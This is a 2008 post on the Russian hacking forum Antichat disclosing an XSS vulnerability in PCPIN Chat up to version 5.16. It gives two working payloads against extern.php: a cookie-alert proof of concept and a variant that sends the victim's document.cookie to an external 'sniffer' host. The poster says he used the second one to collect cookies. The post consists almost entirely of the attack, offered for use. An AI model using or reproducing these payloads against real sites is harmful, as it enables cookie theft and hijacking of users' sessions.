Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   PCPIN chat (https://forum.antichat.xyz/showthread.php?t=66673)

Qwazar 07.04.2008 18:56
PCPIN chat
 
Не нашёл открытой темы, куда можно постить уязвимости движков, в общем вот, нашёл почти год назад, не помню, почему так извращался.

Type:[XSS]
Product: PCPIN Chat <= 5.16

Код:
http://sitename/chat/extern.php?ext=javascript:alert(document.cookie)
Ну, а на сниффер слал так, наверное можно и проще, сейчас лень было переписывать:

Код:
extern.php?ext=javascript:navigate('http:'.concat('//sniffer.xx?',document.cookie))


Время: 23:22